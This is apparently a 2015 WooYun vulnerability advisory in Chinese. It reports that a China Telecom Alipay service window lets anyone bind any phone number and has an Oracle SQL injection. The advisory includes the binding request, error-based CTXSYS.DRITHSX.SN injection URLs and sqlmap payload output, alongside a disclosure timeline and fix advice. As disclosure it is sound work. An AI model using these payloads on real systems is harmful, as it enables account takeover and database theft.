当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148166

漏洞标题:中国电信支付宝服务窗任意绑定全国电信手机号码漏洞(可查话费/办业务呼转/SQL注入拖库等)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-10-21 09:53

修复时间:2015-12-07 11:06

公开时间:2015-12-07 11:06

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

能够随便进全国的网厅太严重.可以设置呼转,而且有的省份有短信保管箱.而且这个系统还有SQL注入.....
终于进了13333333333 13388888888

详细说明:

该业务是在支付宝的服务窗里,在里面添加中国电信,然后有个手机号码绑定功能.
这次的漏洞有点严重,接口权限很大,可以登录全国的网厅,可以办理业务如呼叫转移业务.
存在一个SQL注入,一开始只能盲注,最后经过手工精心构造加上SQLMAP终于可以报错注入了.
图片不太好上传,我后面附一张完整的漏洞图片可以嘛?这里把文字复制上来.详细描述见漏洞证明.
支付宝任意绑定中国电信全国手机号码漏洞(可查话费/办业务等)
接口地址: **.**.**.**:8001/AlipayChinatel/userBind.html?alipayUserId=支付宝USERID&phoneNum=13388888888

绑定成功后,不仅可以通过服务窗查询话费,而且可以通过[充流量]功能登录到网上营业厅,查询个人姓名,办理业务比如呼叫转移等








**.**.**.**:8001/AlipayChinatel/userBind.html?alipayUserId=1&phoneNum=1‘ and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1)) –%20

**.**.**.**:8001/AlipayChinatel/userBind.html?alipayUserId=1&phoneNum=1’ and 1=ctxsys.drithsx.sn(1,(select * from session_roles)) –%20

SQLMAP PAYLOAD
Parameter: #1* (URI)
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: **.**.**.**:8001/AlipayChinatel/userBind.html?alipayUserId=1&phoneNum=1‘ and 1=-7434 OR 7566=CTXSYS.DRITHSX.SN(7566,(CHR(113)||CHR(98)||CHR(113)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (7566=7566) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(113)||CHR(113)))– mTeS)) –

current-db




漏洞证明:

支付宝任意绑定中国电信全国手机号码漏洞(可查话费:办业务等).jpg


没有特别深入.....整理了一下才发出来.

修复方案:

SQL注入做下过滤,采用预编译最好;
绑定的时候要分第一步第二部,别直接第二步就能绑定了.

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-23 11:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无